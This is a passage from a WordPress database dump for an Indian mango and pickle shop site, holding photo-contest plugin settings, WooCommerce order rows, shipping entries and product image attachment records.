0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"7d5cf490966639d247a5458ac12bec7f\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-25 16:15:11','2022-02-25 10:45:11','',900,'https://mangomitra.in/?p=1014',0,'revision','',0),(1015,1,'2022-02-25 16:16:47','2022-02-25 10:46:47','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"49a0b086-30fd-490c-be13-c018891d5207\",\"type\":\"text\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":false,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true},{\"id\":\"prizes\",\"title\":\"Prizes\",\"content\":\"\",\"collapsed\":false}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#209610\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#239913\",\"secondary\":\"#3eb538\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"7d5cf490966639d247a5458ac12bec7f\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-25 16:16:47','2022-02-25 10:46:47','',900,'https://mangomitra.in/?p=1015',0,'revision','',0),(1016,1,'2022-02-25 16:39:01','2022-02-25 11:09:01','','Order &ndash; February 25, 2022 @ 04:39 PM','','wc-completed','open','closed','wc_order_BXNttBuG5eahJ','order-feb-25-2022-1109-am','','','2022-02-25 16:51:24','2022-02-25 11:21:24','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1016',0,'shop_order','',7),(1017,1,'2022-02-25 16:54:49','2022-02-25 11:24:49','','Order &ndash; February 25, 2022 @ 04:54 PM','','wc-cancelled','open','closed','wc_order_ZnxFTriyRG1us','order-feb-25-2022-1124-am','','','2022-03-03 10:36:48','2022-03-03 05:06:48','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1017',0,'shop_order','',7),(1018,1,'2022-03-03 10:34:03','2022-03-03 05:04:03','','Order &ndash; March 3, 2022 @ 10:34 AM','','wc-completed','open','closed','wc_order_Ua5FTFCqLvFat','order-mar-03-2022-0504-am','','','2022-03-03 10:35:22','2022-03-03 05:05:22','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1018',0,'shop_order','',5),(1019,25,'2022-03-03 10:52:05','2022-03-03 05:22:05','','WhatsApp Image 2022-03-02 at 4.24.39 PM','','inherit','closed','closed','','whatsapp-image-2022-03-02-at-4-24-39-pm','','','2022-03-03 10:52:29','2022-03-03 05:22:29','',0,'https://mangomitra.in/wp-content/uploads/2022/03/WhatsApp-Image-2022-03-02-at-4.24.39-PM.jpeg',0,'attachment','image/jpeg',0),(1022,1,'2022-03-03 10:56:23','2022-03-03 05:26:23','','Order &ndash; March 3, 2022 @ 10:56 AM','','wc-completed','open','closed','wc_order_8JrCFu9UQyN47','order-mar-03-2022-0526-am','','','2022-03-03 10:58:38','2022-03-03 05:28:38','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1022',0,'shop_order','',6),(1023,1,'2022-03-03 11:02:37','2022-03-03 05:32:37','','Order &ndash; March 3, 2022 @ 11:02 AM','','wc-cancel-request','open','closed','wc_order_mt1WJQxGBybQX','order-mar-03-2022-0532-am','','','2022-03-03 11:07:48','2022-03-03 05:37:48','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1023',0,'shop_order','',5),(1024,1,'2022-03-03 12:14:05','2022-03-03 06:44:05','','shipping cost','','publish','closed','closed','','shipping-cost','','','2022-03-03 12:18:19','2022-03-03 06:48:19','',0,'https://mangomitra.in/?p=1024',0,'pi_shipping_method','',0),(1025,1,'2022-03-03 12:19:28','2022-03-03 06:49:28','','shipping cost','','publish','closed','closed','','shipping-cost-2','','','2022-03-03 12:19:28','2022-03-03 06:49:28','',0,'https://mangomitra.in/?p=1025',0,'pi_shipping_method','',0),(1026,1,'2022-03-03 12:55:52','2022-03-03 07:25:52','','Zone 1','','publish','closed','closed','','zone-1','','','2022-03-03 12:55:52','2022-03-03 07:25:52','',0,'https://mangomitra.in/?p=1026',1,'wc_afrsm_zone','',0),(1027,1,'2022-03-03 12:57:46','2022-03-03 07:27:46','','shipping cost','','publish','closed','closed','','shipping-cost','','','2022-03-03 13:05:23','2022-03-03 07:35:23','',0,'https://mangomitra.in/wc_afrsm/shipping-cost/',1,'wc_afrsm','',0),(1028,1,'2022-03-03 13:04:19','2022-03-03 07:34:19','','shipping cost','','publish','closed','closed','','shipping-cost-2','','','2022-03-03 13:04:19','2022-03-03 07:34:19','',0,'https://mangomitra.in/wc_afrsm/shipping-cost-2/',0,'wc_afrsm','',0),(1031,1,'2022-03-03 15:01:22','2022-03-03 09:31:22','','Screenshot (26)','','inherit','closed','closed','','screenshot-26','','','2022-03-03 15:01:22','2022-03-03 09:31:22','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Screenshot-26.png',0,'attachment','image/png',0),(1033,1,'2022-03-03 15:04:46','2022-03-03 09:34:46','','mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842','','inherit','closed','closed','','mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842','','','2022-03-03 15:04:46','2022-03-03 09:34:46','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842.jpg',0,'attachment','image/jpeg',0),(1034,1,'2022-03-03 15:07:15','2022-03-03 09:37:15','','mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842','','inherit','closed','closed','','mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-2','','','2022-03-03 15:07:15','2022-03-03 09:37:15','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1.jpg',0,'attachment','image/jpeg',0),(1045,1,'2022-03-03 15:30:20','2022-03-03 10:00:20','','mangoes','','inherit','closed','closed','','mangoes','','','2022-03-03 15:30:20','2022-03-03 10:00:20','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mangoes.jpg',0,'attachment','image/jpeg',0),(1046,1,'2022-03-03 15:33:33','2022-03-03 10:03:33','','Screenshot (28)','','inherit','closed','closed','','screenshot-28','','','2022-03-03 15:33:33','2022-03-03 10:03:33','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Screenshot-28.png',0,'attachment','image/png',0),(1047,1,'2022-03-03 15:41:03','2022-03-03 10:11:03','','Mango','','inherit','closed','closed','','mango-2','','','2022-03-03 15:41:03','2022-03-03 10:11:03','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Mango.gif',0,'attachment','image/gif',0),(1049,1,'2022-03-03 15:58:55','2022-03-03 10:28:55','','159-1593158_free-juice-wallpapers-mango-juice','','inherit','closed','closed','','159-1593158_free-juice-wallpapers-mango-juice','','','2022-03-03 15:58:55','2022-03-03 10:28:55','',0,'https://mangomitra.in/wp-content/uploads/2022/03/159-1593158_free-juice-wallpapers-mango-juice.jpg',0,'attachment','image/jpeg',0),(1051,1,'2022-03-03 16:12:25','2022-03-03 10:42:25','','Screenshot (32)','','inherit','closed','closed','','screenshot-32','','','2022-03-03 16:12:25','2022-03-03 10:42:25','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Screenshot-32.png',0,'attachment','image/png',0),(1057,1,'2022-03-03 17:41:30','2022-03-03 12:11:30','','banner [Recovered]-04','','inherit','closed','closed','','banner-recovered-04-3','','','2022-03-03 17:41:30','2022-03-03 12:11:30','',0,'https://mangomitra.in/wp-content/uploads/2022/03/banner-Recovered-04.png',0,'attachment','image/png',0),(1060,1,'2022-03-03 17:56:07','2022-03-03 12:26:07','','cropped-bg-01.png','','inherit','closed','closed','','cropped-bg-01-png','','','2022-03-03 17:56:07','2022-03-03 12:26:07','',0,'https://mangomitra.in/wp-content/uploads/2022/02/cropped-bg-01.png',0,'attachment','image/png',0),(1067,21,'2022-03-04 09:58:11','2022-03-04 04:28:11','','mangoes','','inherit','closed','closed','','mangoes-2','','','2022-03-04 09:58:11','2022-03-04 04:28:11','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mangoes-1.jpg',0,'attachment','image/jpeg',0),(1068,21,'2022-03-04 10:08:40','2022-03-04 04:38:40','','aapemdi pickle mngo','','inherit','closed','closed','','aapemdi-pickle-mngo','','','2022-03-04 10:10:41','2022-03-04 04:40:41','',0,'https://mangomitra.in/wp-content/uploads/2022/03/aapemdi-pickle-mngo.jpg',0,'attachment','image/jpeg',0),(1070,21,'2022-03-04 10:16:00','2022-03-04 04:46:00','','aapemdi pickle mngo','','inherit','closed','closed','','aapemdi-pickle-mngo-2','','','2022-03-04 10:16:00','2022-03-04 04:46:00','',0,'https://mangomitra.in/wp-content/uploads/2022/03/aapemdi-pickle-mngo-1.jpg',0,'attachment','image/jpeg',0),(1071,21,'2022-03-04 10:16:01','2022-03-04 04:46:01','','avakaya pckle mngo','','inherit','closed','closed','','avakaya-pckle-mngo','','','2022-03-04 10:17:21','2022-03-04 04:47:21','',0,'https://mangomitra.in/wp-content/uploads/2022/03/avakaya-pckle-mngo.jpg',0,'attachment','image/jpeg',0),(1072,21,'2022-03-04 10:16:02','2022-03-04 04:46:02','','avakaya pckle1','','inherit','closed','closed','','avakaya-pckle1','','','2022-03-04 10:16:02','2022-03-04 04:46:02','',0,'https://mangomitra.in/wp-content/uploads/2022/03/avakaya-pckle1.jpeg',0,'attachment','image/jpeg',0),(1073,21,'2022-03-04 10:16:04','2022-03-04 04:46:04','','dasheri','','inherit','closed','closed','','dasheri','','','2022-03-04 10:24:11','2022-03-04 04:54:11','',0,'https://mangomitra.in/wp-content/uploads/2022/03/dasheri.jpg',0,'attachment','image/jpeg',0),(1074,21,'2022-03-04 10:16:05','2022-03-04 04:46:05','','devgad alphonso','','inherit','closed','closed','','devgad-alphonso','','','2022-03-11 17:21:17','2022-03-11 11:51:17','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-alphonso.jpg',0,'attachment','image/jpeg',0),(1075,21,'2022-03-04 10:16:06','2022-03-04 04:46:06','','devgad alphonso1','','inherit','closed','closed','','devgad-alphonso1','','','2022-03-11 16:05:18','2022-03-11 10:35:18','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-alphonso1.jpeg',0,'attachment','image/jpeg',0),(1076,21,'2022-03-04 10:16:07','2022-03-04 04:46:07','','kesar','','inherit','closed','closed','','kesar-2','','','2022-03-04 10:35:12','2022-03-04 05:05:12','',0,'https://mangomitra.in/wp-content/uploads/2022/03/kesar.jpg',0,'attachment','image/jpeg',0),(1077,21,'2022-03-04 10:16:09','2022-03-04 04:46:09','','magaya pckle','','inherit','closed','closed','','magaya-pckle','','','2022-03-04 10:16:09','2022-03-04 04:46:09','',0,'https://mangomitra.in/wp-content/uploads/2022/03/magaya-pckle.png',0,'attachment','image/png',0),(1078,21,'2022-03-04 10:16:11','2022-03-04 04:46:11','','omlet pckle','','inherit','closed','closed','','omlet-pckle','','','2022-03-04 10:43:54','2022-03-04 05:13:54','',0,'https://mangomitra.in/wp-content/uploads/2022/03/omlet-pckle.png',0,'attachment','image/png',0),(1079,21,'2022-03-04 10:16:12','2022-03-04 04:46:12','','rajapuri','','inherit','closed','closed','','rajapuri','','','2022-03-04 10:46:25','2022-03-04 05:16:25','',0,'https://mangomitra.in/wp-content/uploads/2022/03/rajapuri.jpg',0,'attachment','image/jpeg',0),(1080,21,'2022-03-04 10:16:13','2022-03-04 04:46:13','','ramkela pickle mngo','','inherit','closed','closed','','ramkela-pickle-mngo','','','2022-03-04 10:44:53','2022-03-04 05:14:53','',0,'https://mangomitra.in/wp-content/uploads/2022/03/ramkela-pickle-mngo.png',0,'attachment','image/png',0),(1081,21,'2022-03-04 10:16:14','2022-03-04 04:46:14','','ratnagiri naturally grown','','inherit','closed','closed','','ratnagiri-naturally-grown','','','2022-03-11 17:22:29','2022-03-11 11:52:29','',0,'https://mangomitra.in/wp-content/uploads/2022/03/ratnagiri-naturally-grown.jpg',0,'attachment','image/jpeg',0),(1090,21,'2022-03-04 10:39:28','2022-03-04 05:09:28','','magaya pckle','','inherit','closed','closed','','magaya-pckle-2','','','2022-03-04 10:41:09','2022-03-04 05:11:09','',0,'https://mangomitra.in/wp-content/uploads/2022/03/magaya-pckle-1.png',0,'attachment','image/png',0),(1096,21,'2022-03-04 10:48:56','2022-03-04 05:18:56','','raw-green-mango','','inherit','closed','closed','','raw-green-mango','','','2022-03-11 17:20:00','2022-03-11 11:50:00','',0,'https://mangomitra.in/wp-content/uploads/2022/03/raw-green-mango.jpg',0,'attachment','image/jpeg',0),(1099,21,'2022-03-04 10:55:46','2022-03-04 